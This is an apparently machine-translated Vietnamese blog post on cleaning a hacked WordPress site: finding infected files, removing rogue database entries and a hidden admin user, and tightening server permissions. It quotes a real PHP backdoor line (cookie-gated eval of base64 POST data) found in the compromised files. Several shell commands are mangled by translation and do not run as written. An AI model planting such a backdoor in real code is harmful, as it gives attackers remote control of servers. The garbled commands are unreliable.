WordPress Khai thác - Dọn dẹp các tệp vi rút, SQL và bảo mật máy chủ.

Trước khi bạn đọc bài viết này, bạn sẽ thấy trả lời ở đây, Để hiểu một cái gì đó. :)

Tôi đã tìm thấy nó trong một số tệp blog trên stealthsettings.com, các mã tương tự như những mã bên dưới, xuất hiện do vi-rút với kỳ tích của WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcNếu ở trên là về các tập tin xmlrpc.php từ Buồn ngủ, Tại một grep máy chủ, có vẻ như khá nhiều loại trong mã nguồn.

pppffiuuu

Làm sạch các file bị nhiễm:

Ooookkkk ...
1. Giải pháp tốt nhất, vì nó được thực hiện sao lưuVà làm sạch cơ sở dữ liệu là loại bỏ file WordPress (bạn có thể giữ wp-config.php và các tệp không liên quan chặt chẽ đến nền tảng wp, sau khi chúng được kiểm tra cẩn thận) từ máy chủ và tải lên các tệp gốc từ phiên bản 2.5.1 (Nhân dịp này và thực hiện một wp phiên bản nâng cấp :)) http://wordpress.org/download/ . Lau bao gồm các file theme nếu bạn không tin tưởng mà bạn có thể kiểm tra xem chúng một cách cẩn thận.

Nó dường như đã bị ảnh hưởng và các tập tin trong các chủ đề đã không được sử dụng trước trên blog và chỉ đơn giản là thay đổi chủ đề không giải quyết được vấn đề này.

./andreea/wp-content/themes/default/index.php:

2. Tìm kiếm và xóa tất cả các file có chứa:... * _new.php * _old.php * Jpgg * Giff * Pngg và tập tin wp-info.txt, nếu có.

tìm thấy. -name “* _new.php”
tìm thấy. -name “* _old.php”
tìm thấy. -tên “* .jpgg”
tìm thấy. -tên “* _giff”
tìm thấy. -tên “* _pngg”
tìm thấy. -name “wp-info.txt”

3. trong / Tmp , Tìm kiếm và xóa các thư mục như tmpYwbzT2

SQL làm sạch :

1. Trong bảng bàn wp_options Kiểm tra và xóa các dòng: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Tất cả trong wp_options, đi đến active_plugins và xóa nếu có một plugin mà kết thúc bằng một trong các phần mở rộng * _new.php * _old.php *. jpgg * pngg hoặc Giff. *. nếu phần mở rộng khác bị nghi ngờ, kiểm tra cẩn thận.

3. Bảng wp_users, Xem nếu có một người dùng đã không viết bất cứ điều gì ở bên phải của mình, cột user_nicename. Xóa người dùng này, nhưng nhớ số trên cột ID. Người dùng này có khả năng sử dụng "WordPress”Ca user_login và ở đó nó được tạo ra trên 00: 00: 00 0000-00-00.

4. Đi đến Bảng wp_usermeta và xóa tất cả các dòng thuộc ID trên.

Sau khi bạn đã thực hiện xong việc dọn dẹp sql này, hãy tắt và sau đó kích hoạt bất kỳ plugin nào. (trong blog -> Trang tổng quan -> Plugin)

An toàn máy chủ:

1. Xem những gì các thư mục và tập tin "ghi"(chmod 777) và cố gắng đặt một chmod mà sẽ không còn cho phép viết của họ ở bất kỳ cấp độ nào. (chmod 644 chẳng hạn)

Tìm. -Perm-2-ls

2. Xem những tập tin đã được thiết lập của bit SUID hoặc sgid . Nếu bạn không sử dụng các tập tin đặt trên chúng chmod 0 hoặc gỡ bỏ cài đặt các gói phần mềm mà nó chứa. Họ rất nguy hiểm bởi vì họ thực thi quyền "nhóm"Hoặc"nguồn gốc"Và không có đặc quyền người dùng bình thường để thực hiện tập tin đó.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Kiểm tra cổng nào đang mở và cố gắng để đóng hoặc bảo đảm những người không được sử dụng.

netstat-an | grep-i nghe

Rất nhiều. Tôi thấy Một số blog bị cấm de Google Search và những người khác nói "Anh ấy đã làm rất tốt!!!" . Chà, tôi sẽ làm điều đó cho họ... nhưng bạn sẽ nói gì nếu Google bắt đầu cấm tất cả các trang web hình thành  SE SPAM và đặt Trojan (Trojan.Clicker.HTML) trong cookie?

Là người yêu công nghệ, tôi rất vui được viết tại StealthSettings.com từ năm 2006. Tôi có kinh nghiệm đa dạng với các hệ điều hành: macOS, Windows và Linux, cũng như trong các ngôn ngữ lập trình và nền tảng blogging (WordPress) và cửa hàng trực tuyến (WooCommerce, Magento, PrestaShop).

Làm thế nào để » AntiVirus & Security » WordPress Khai thác - Dọn dẹp các tệp vi rút, SQL và bảo mật máy chủ.

1 suy nghĩ về vấn đềWordPress Khai thác - Dọn dẹp các tệp vi-rút, SQL và bảo mật máy chủ. ”

Để lại một bình luận